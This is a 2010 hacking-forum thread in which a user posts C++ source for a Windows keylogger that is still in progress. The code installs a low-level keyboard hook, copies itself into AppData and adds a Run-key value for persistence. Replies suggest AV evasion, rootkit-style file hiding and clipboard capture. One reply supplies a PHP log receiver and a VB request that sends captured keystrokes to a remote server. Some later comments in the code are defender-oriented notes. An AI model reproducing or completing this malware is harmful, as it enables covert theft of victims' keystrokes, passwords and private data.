What I've been working on- Keylogger
03-27-2010, 08:45 AM (This post was last modified: 03-27-2010 08:46 AM by MC'.)
Post: #1
What I've been working on- Keylogger
Hey guys

I know most of the code here isn't purely malicious, but I figure I would post what I'm working on.

I also just programmed a binder using the UpdateResource api complete with a configuration file to support different files types. If you guys want to see it, express interest or PM me

Here's the code. Obviously, the final version won't be visible. I put it in a console window for now.
It logs keys, but it's not completed. I still need a system for naming files (see below, I just made a snippet to work with time). I need to find a way to upload logs, to prevent multiple instances, and hopefully add some more hooks and modify the registry

Code:
/*
#include <windows.h>
#include <string>
#include <iostream>
#include <fstream>
#include <shlobj.h>
using namespace std;

void FirstRun(char*apppath);
LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam);
bool RegExitHotkey();
bool WriteToFile(char*fpath, string data);
bool WriteToFile(char*fpath, char*data);
bool HideFile(char*path);
void HotKeyPressed();


HHOOK hook;
HWND activewindow;
HWND oldwindow;
char wintext[256];
string data;
/*
TO DO

Prevent multiple instances

Clipboard

Upload

Name logs

System profile

Don't show hidden files (registry)
*/

// Entry point of the posted sample.
//
// What the visible code does, in order:
//   1. Builds the path "<per-user application data folder>\test" and tries to
//      create that directory.
//   2. If the directory was newly created, calls FirstRun() with that path.
//   3. Installs a WH_KEYBOARD_LL hook whose callback is KeyboardProc.
//   4. Pumps the thread's message queue until GetMessage() returns 0, then
//      removes the hook.
//
// Defender note: the artifacts visible in this function are the "test"
// directory under the user's application-data folder and a low-level keyboard
// hook owned by a process that has no reason to read keyboard input. Both are
// created without administrator rights.
int main()
{
    // Author's TODO list (none of these steps is implemented in this function):
    //prevent multiple instances
//check if keylogger is installed. If not, install and create system profile
//install for one user or all users? Check is user is admin?
//register exit key
//Name logs by date and time. at the start of each log, list all open windows
    char apppath[MAX_PATH];
    SHGetFolderPath(NULL, CSIDL_APPDATA, NULL, 0, apppath); // fills apppath with the per-user application data folder
    strcat(apppath, "\\");
    strcat(apppath, "test"); // directory name used as the install location
    LPSECURITY_ATTRIBUTES attr;
    attr = NULL;
    if (CreateDirectory(apppath, attr))
    {
        // Directory did not exist before: treated as the first run on this account.
        FirstRun(apppath);

    }
    else if (GetLastError() == ERROR_ALREADY_EXISTS) // directory already present: treated as "already installed"
    {
// empty branch; the author planned to choose a log name here


    }


    // The callback runs in this process, on this thread's message loop.
    hook = SetWindowsHookEx(
               WH_KEYBOARD_LL,
               KeyboardProc,
               GetModuleHandle(NULL), // module handle of this executable; no separate DLL is involved
               // NULL,
               0);

    MSG msg;
    while (GetMessage(&msg, NULL, 0, 0))
    {
        if (msg.message == WM_HOTKEY)
        {
            // HotKeyPressed() is an empty stub in this listing.
            HotKeyPressed();
        }
        TranslateMessage(&msg);
        DispatchMessage(&msg);
    }

    UnhookWindowsHookEx(hook);
    return 0;
}


// First-run installation step: copies the running executable into the
// directory passed in and registers the copy to start at logon.
//
// apppath: in/out buffer holding the install directory; "\\Keylogger.exe" is
//          appended to it in place, so the caller's buffer is modified.
//
// Defender note: the persistence artifacts written here are
//   - the file "Keylogger.exe" inside the install directory, and
//   - a REG_SZ value named "Keylogger" under
//     HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
//     whose data is the path of that copy.
// A per-user Run value pointing into the application-data folder is a common
// thing to alert on, and any autorun audit of the account lists it.
void FirstRun(char*apppath)
{

    char filepath[MAX_PATH];

    // Full path of the currently running executable.
    GetModuleFileName(NULL ,filepath,MAX_PATH);
    strcat(apppath, "\\Keylogger.exe");
    if (CopyFile(filepath, apppath, true))// third argument true: the copy fails if the destination already exists
    {
        HKEY key;

        // Per-user autorun key; writable without elevation.
        if (RegCreateKey(HKEY_CURRENT_USER,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&key) == 0)
        {
            RegSetValueEx((HKEY)key,"Keylogger",0,REG_SZ,(BYTE *)apppath,strlen(apppath));

        }

    }

}



// Low-level keyboard hook callback installed by main().
//
// Translates the virtual-key code of each event into text, appends it to the
// global buffer `data`, records the title of the foreground window whenever
// that window changes, and flushes the buffer to "log2.txt" once it holds
// more than 50 characters. Always forwards the event with CallNextHookEx().
//
// Log format produced by the visible code:
//   - digits and letters as single characters (letters always lower case;
//     shift state is not applied, it only appears as separate "[S]" markers),
//   - bracketed markers such as "[CTL]", "[ALT]", "[WIN]", "[CAPS]", "[NUM]",
//     "[B]" (backspace) and "[S]" / "[/S]",
//   - window titles on their own line, preceded by a newline and three tabs.
//
// Defender note: "log2.txt" is a relative path, so the file appears in the
// process's current directory. The bracketed markers and the tab-indented
// window titles are what to look for when triaging a suspect text file.
LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{

    // lParam carries the KBDLLHOOKSTRUCT for this event; vkCode is the virtual-key code.
    PKBDLLHOOKSTRUCT p = (PKBDLLHOOKSTRUCT) (lParam);
    unsigned long code = p->vkCode;
    // Taken for WM_KEYDOWN with nCode == HC_ACTION, or for WM_SYSKEYDOWN.
    if (nCode== HC_ACTION && wParam == WM_KEYDOWN || wParam == WM_SYSKEYDOWN)
    {

        if (code <= 57 && code >= 48) // top-row digits 0-9: the code equals the ASCII digit
        {
            data += (char)code;
        }
        else if (code <= 105 && code >= 96)
        {
            data += (char)(code-48); // numeric keypad 0-9 mapped onto the ASCII digits
        }
        else if (code <= 90 && code >= 65) // letter keys: upper-case code shifted to lower-case ASCII
        {
            data += (char)(code+32);
        }
          else if (code <= 123 && code >= 112) // function keys F1-F12
        {
            data += "F";
            data += (code - 111); // appended as one character whose value is 1-12, not as decimal text
        }
        else
        {
            switch (code)
            {
            case 13: // enter
                data += "\n";
                break;
            case 162:
                data += "[CTL]"; // left control
                break;
            case 163:
                data += "[CTL]"; // right control
                break;
            case 20: // caps lock
                data += "[CAPS]";
                break;
            case 8: // backspace
                data += "[B]";
                break;
            case 32: // space bar
                data += " ";
                break;
            case 190: // period key
                data += ".";
                break;
                 case 188: // comma key
                data += ",";
                break;
            case 161: // right shift
                data += "[S]";
                break;
            case 160: // left shift
                data += "[S]";
                break;
case 16: // generic shift
                data += "[S]";
                break;
                case 17: // generic control
                data += "[CTL]";
                break;
                case 18: // alt
                data += "[ALT]";
                break;
                case 91: // left Windows key
                data += "[WIN]";
                break;
                case 187: // the '=' key
                data += "=";
                break;
  case 144: // num lock
                data += "[NUM]";
                break;

            default:
                // Any other key: "{" + one character whose value is the code + "}".
                data+= "{";
                data+= code;
                data+= "}";
                break;
            }

        }

    }
    // In practice reached for WM_KEYUP with nCode == HC_ACTION, because the
    // branch above already takes every WM_SYSKEYDOWN.
    else  if (nCode== HC_ACTION && wParam == WM_KEYUP || wParam == WM_SYSKEYDOWN)
    {
        switch (code)
        {
        case 161: // right shift released
            data += "[/S]";
            break;

        default:
            break;
        }


    }

    // Record the foreground window's title whenever the foreground window
    // handle differs from the one seen on the previous call.
    free(wintext);
    oldwindow = activewindow;
    activewindow = GetForegroundWindow();
    if (activewindow!=oldwindow)
    {
        GetWindowText(activewindow, wintext, 256);
        data += "\n\t\t\t";
        data += wintext;
        data += "\n\n\n";
    }
// Flush to disk once more than 50 characters are buffered, then start a new buffer.
    if (data.length() > 50)
    {
        WriteToFile("log2.txt", data);
        data.clear();
    }


    // Pass the event on so normal keyboard handling continues.
    return CallNextHookEx(hook, nCode, wParam, lParam);
}





// Reports whether `path` refers to something whose attributes can be read.
// Works for files and directories alike. Any failure of GetFileAttributes()
// is reported as "does not exist".
bool DoesFileExist(char*path)
{
    const DWORD attributes = GetFileAttributes(path);
    return attributes != INVALID_FILE_ATTRIBUTES;
}

// Sets the attributes of `path` to FILE_ATTRIBUTE_HIDDEN and reports whether
// the call succeeded. Only that one flag is passed, so it replaces whatever
// attributes the file had before.
// Defender note: the hidden attribute is cosmetic. The file is still returned
// by any listing that includes hidden items (for example `dir /a`).
bool HideFile(char*path)
{
    const BOOL changed = SetFileAttributes(path, FILE_ATTRIBUTE_HIDDEN);
    return changed != 0;
}


// Appends `data` to the file at `fpath`, creating the file if it is missing.
// Returns false when the file cannot be opened, true otherwise. The result of
// the write itself is not checked.
bool WriteToFile(char*fpath, string data)
{
    std::ofstream out(fpath, std::ios::out | std::ios::app);
    if (out.is_open())
    {
        out << data;
        out.close();
        return true;
    }
    return false;
}

// C-string overload: appends the NUL-terminated text `data` to the file at
// `fpath`, creating the file if it is missing. Returns false when the file
// cannot be opened, true otherwise. The result of the write is not checked.
bool WriteToFile(char*fpath, char*data)
{
    std::ofstream out(fpath, std::ios::out | std::ios::app);
    if (out.is_open())
    {
        out << data;
        out.close();
        return true;
    }
    return false;
}




// Placeholder: reads the current time and converts it to local broken-down
// time, then discards the result. Nothing is returned or stored.
void GetDate()
{
    time_t now;
    time(&now);
    struct tm* local = localtime(&now);
    (void)local; // not used yet
}


// Registers hot key id 1 for Ctrl+Alt+B with no window handle (NULL is passed),
// and returns whether RegisterHotKey() succeeded.
bool RegExitHotkey()
{
    const UINT modifiers = MOD_ALT | MOD_CONTROL;
    const UINT virtualKey = 0x42; // virtual-key code of the 'B' key
    const BOOL registered = RegisterHotKey(NULL, 1, modifiers, virtualKey);
    return registered;
}
// Called from main()'s message loop when a WM_HOTKEY message is received.
// Empty stub in this listing: the comment below records the author's intent,
// no uninstall or cleanup is actually performed.
void HotKeyPressed()
{
//uninstall/close/destroy everything
}





SNIPPET

#include <iostream>
#include <string.h>
#include <time.h>

using namespace std;

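// Prints the current local time, then each of its fields on a line of its own
// (weekday, month, day, hour, minute, second, year).
//
// The fields come from splitting the asctime() text
// "Www Mmm dd hh:mm:ss yyyy\n" on spaces and colons. The trailing newline is
// removed first. Otherwise it stays attached to the year token and the
// full-time line is followed by an empty line.
//
// Not thread-safe: localtime(), asctime() and strtok() all use static state.
void GetDate()
{
    time_t rawtime;
    time ( &rawtime );
    struct tm * timeinfo = localtime ( &rawtime );
    if (timeinfo == NULL)
    {
        return; // the timestamp could not be converted; nothing to print
    }

    char* times = asctime( timeinfo );
    if (times == NULL)
    {
        return;
    }
    times[strcspn(times, "\n")] = '\0'; // drop asctime()'s trailing newline
    cout << "The Local Time is: " << times << endl;

    // Label for each token, in the order asctime() emits them.
    static const char* const labels[] =
    {
        "The weekday is ",
        "The month is ",
        "The day is ",
        "The hour is ",
        "The minute is ",
        "The second is ",
        "The year is "
    };
    const int labelCount = sizeof(labels) / sizeof(labels[0]);

    int i = 0;
    // strtok() skips runs of delimiters, so the two spaces asctime() puts
    // before a single-digit day do not produce an empty token.
    for (char* splits = strtok(times, " :"); splits != NULL; splits = strtok(NULL, " :"))
    {
        if (i < labelCount)
        {
            cout << labels[i] << splits << endl;
        }
        i++;
    }
}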

I think I'm going to name logs based on the day and time. I put the snippet at the end of the other code.

I've run into a few roadblocks. I cant seem to get a working global hook on the message queue, which would handle changes to the clipboard and foreground window. My code also won't install for all users, as the registry key would not add to HKEY_LOCAL_MACHINE

Feel free to offer comments/criticism/help
03-27-2010, 11:02 AM
Post: #2
RE: What I've been working on- Keylogger
Pretty good so far, Try this for upload
http://www.chilkatsoft.com/ftp-library.asp .

"Character is determined more by the lack of certain experiences than by those one has had."
Friedrich Nietzsche
03-27-2010, 03:16 PM
Post: #3
RE: What I've been working on- Keylogger
Makes me warm inside, great work!

[Image: pgsig copy.png]
03-28-2010, 12:58 AM
Post: #4
RE: What I've been working on- Keylogger
Good idea to use logs based on the day and time. I like the way that you used for handling. I skimmed through code and
i don't get all parts well, but my personal opinion is positive, it is good.

There's a fine line between genius and insanity. I have erased this line.
Oscar Levant
There's a fine line between an administrator and black hat hacker. I have erased this line.
Dr DEBCOL
03-28-2010, 07:34 AM (This post was last modified: 03-28-2010 07:40 AM by PoZHx.)
Post: #5
RE: What I've been working on- Keylogger
There plenty of error in your code
  • Duplicated functions
  • Your included headers

Your not defining your API's with A or W...
Makes it pain to change when your porting it

Your to do list:
Don't show hidden files (registry)
Why not just learn how to make a keylogger and hook NtQueryDirectoryFile and filter out your file there?

Prevent multiple instances
CreateMutexA/W
http://msdn.microsoft.com/en-us/library/...S.85).aspx

Clipboard
OpenClipboard()
http://msdn.microsoft.com/en-us/library/...85%29.aspx

System profile
What?

Upload
Learn Winsock and sent it using SMTP

Your hide file is not going to help much/at all
Also you have alot of unnecessary code just wasting memory!

Also you have some weird coding lol
RegSetValueExA((HKEY)key.....)
Why you sending a HKEY cast when the variable "key" is already HKEY

Also you have no sort of protection against keeping it undetected from AV's
how do you expect it to keep undetected..
My SAH Tool would eat this keylogger for breakfast!

Why did you even post your code with so many mistake
took me like 5mins to fix your programming mistakes!

Once you've cleaned up your code
then i'll give you some good suggestions for you to research up

My website
http://www.DarkHook.net

Programming Languages:
  • C++ Win32
  • MASM
Interests:
  • Reverse Engineering
  • Security
  • GameHacking
03-28-2010, 08:42 AM
Post: #6
RE: What I've been working on- Keylogger
If it is 6.0 then there is no need for him to declare with A/W

[Image: pgsig copy.png]
03-28-2010, 08:48 AM
Post: #7
RE: What I've been working on- Keylogger
(03-28-2010 08:42 AM)FreckleS Wrote:  If it is 6.0 then there is no need for him to declare with A/W

I don't have Visual C++ 6.0 but it should be using A and W for API's

and MC should still define it as A/W in his programming so people with different compiler can compile it without changing code

My website
http://www.DarkHook.net

Programming Languages:
  • C++ Win32
  • MASM
Interests:
  • Reverse Engineering
  • Security
  • GameHacking
03-28-2010, 01:23 PM
Post: #8
RE: What I've been working on- Keylogger
Thanks for all the positive feedback guys! I'll be sure to post the code as I make improvements

(03-28-2010 07:34 AM)PoZHx Wrote:  Why did you even post your code with so many mistake
took me like 5mins to fix your programming mistakes!

Once you've cleaned up your code
then i'll give you some good suggestions for you to research up

I am aware that there are mistakes. I am not the most experienced c++ programmer, and by taking on a large project and fixing my mistakes I'm becoming more experienced

I appreciate the fact that you are providing me help. I have put a good amount of time into programming what I have there, so please don't treat me like I'm throwing garbage at you

(03-28-2010 07:34 AM)PoZHx Wrote:  Your to do list:
Don't show hidden files (registry)
Why not just learn how to make a keylogger and hook NtQueryDirectoryFile and filter out your file there?

Prevent multiple instances
CreateMutexA/W
http://msdn.microsoft.com/en-us/library/...S.85).aspx

Clipboard
OpenClipboard()
http://msdn.microsoft.com/en-us/library/...85%29.aspx

System profile
What?

Upload
Learn Winsock and sent it using SMTP

Your hide file is not going to help much/at all
Also you have alot of unnecessary code just wasting memory!

Also you have some weird coding lol
RegSetValueExA((HKEY)key.....)
Why you sending a HKEY cast when the variable "key" is already HKEY

Also you have no sort of protection against keeping it undetected from AV's
how do you expect it to keep undetected..
My SAH Tool would eat this keylogger for breakfast!

For uploading, why would you prefer winsock and sending with SMTP over uploading via ftp? I've never done either, but having seen some ftp code, it looks fairly simple

Also, could you elaborate on what you mean by protecting it against AV's to keep it UD?

Ill have to look into mutex functions and hooking NtQueryDirectoryFile. I'm not sure how important hiding the files would be, as much as the function. Would you know a way to hide the function?
I wasn't really intending to turn it into a keylogger-rootkit morph, but hiding files and processes would certainly be a nice addition

Also, when I said "system profile," I just meant that Id collect as much info about the user as I could on the first run, and write it to the first log.

Anyway, Ill keep on programming. Id like to remind you once again that I'm not a terribly experienced c++ programmer, so try to make the comments more constructive than critical
03-28-2010, 01:42 PM
Post: #9
RE: What I've been working on- Keylogger
If you use FTP then the account details can easily be reversed/discovered. By using a connection such as a TCP you can simply create a request to a php file and the php code can actually write the contents to a file on the server.

PHP Code:
Code:
<?php
// Receiver script: appends the value of the `w` query parameter to "keys.log"
// in the script's working directory. No authentication or validation of the
// caller or of the value is visible here.
//
// Defender note: the data arrives in the query string of a GET request, so for
// plain-HTTP traffic every submission is also recorded in the web server's
// access log and by any HTTP proxy on the path. Repeated requests to one
// script with a long, text-like `w=` parameter are a usable network indicator.
$file = "keys.log";
$info = $_GET['w'];

if (file_exists($file)) { // Check if the log exists.
    $Log_Write = "a"; // Append mode: keep writing to the existing file.
    $info = "\n".$info; // Each later submission starts on a new line.
} else {
    $Log_Write = "x"; // Create-only mode: the file is created for the first line.
    $info = $info;
}

// `or` binds more loosely than `=`, so $open holds fopen()'s result and
// chmod() runs only if fopen() failed. $open is then still false and the
// die() below is reached.
$open = fopen($file, $Log_Write) or chmod($file, 0777); // Opening the file.
if(!$open){
die('Cant open log file!');
}
$t = fwrite($open, $info); // Write to file; the return value in $t is not used.
fclose($open); // Close file.
?>

Then simply create the request. I don't have TCP example on me atm but a simple HTTP request works fine.
Code:
' Creates an HTTP request object whose URL is hostName & "?w=" & keys, i.e. the
' captured text is placed in the query string. This fragment only constructs
' the request; nothing shown here sends it.
' Defender note: for plain-HTTP traffic, data carried in a query string is
' visible in proxy and web-server logs.
Dim req As Net.HttpWebRequest
            req = Net.HttpWebRequest.Create(hostName & "?w=" & keys)
That of course is VB but you should be able to work out how to do it in C++ easily enough.

[Image: pgsig copy.png]
03-28-2010, 08:58 PM
Post: #10
RE: What I've been working on- Keylogger
Here is something i found on the net (I am not so good at C++). This is example of way of uploading file on FTP server... The only "tricky" thing is CkUpload.h which i dont have in default dev c++ environment... On my opinion CkUpload.h contains information about custom variables used in the program down there...

Code:
#include <iostream>
      #include <CkUpload.h>
      using namespace std;
      // Vendor sample for the Chilkat upload component: posts three local files
      // to a server-side page over HTTP and prints the outcome.
      // Requires the third-party CkUpload.h header, which is not part of a
      // default compiler installation.
      void ChilkatSample(void)
      {
          CkUpload uploader;

          // Server-side page (ASP, ASP.NET, Perl, Python, Ruby, CGI, etc.)
          // that will process the HTTP upload.
          uploader.put_Hostname("www.freeupload.com");
          uploader.put_Path("/freeaspupload/testUpload.asp");

          // Files to send, each under its own form-field name.
          uploader.AddFileReference("file1","dude.gif");
          uploader.AddFileReference("file2","pigs.xml");
          uploader.AddFileReference("file3","sample.doc");

          // Blocking call: returns only once the upload has finished.
          // (The component also offers an asynchronous upload, shown in a
          // separate vendor example.)
          const bool uploaded = uploader.BlockingUpload();
          if (uploaded) {
              printf("Files uploaded!\n");
          }
          else {
              printf("%s\n",uploader.lastErrorText());
          }
      }
Source : daniweb

Read rules Smile
[Image: legislator.png]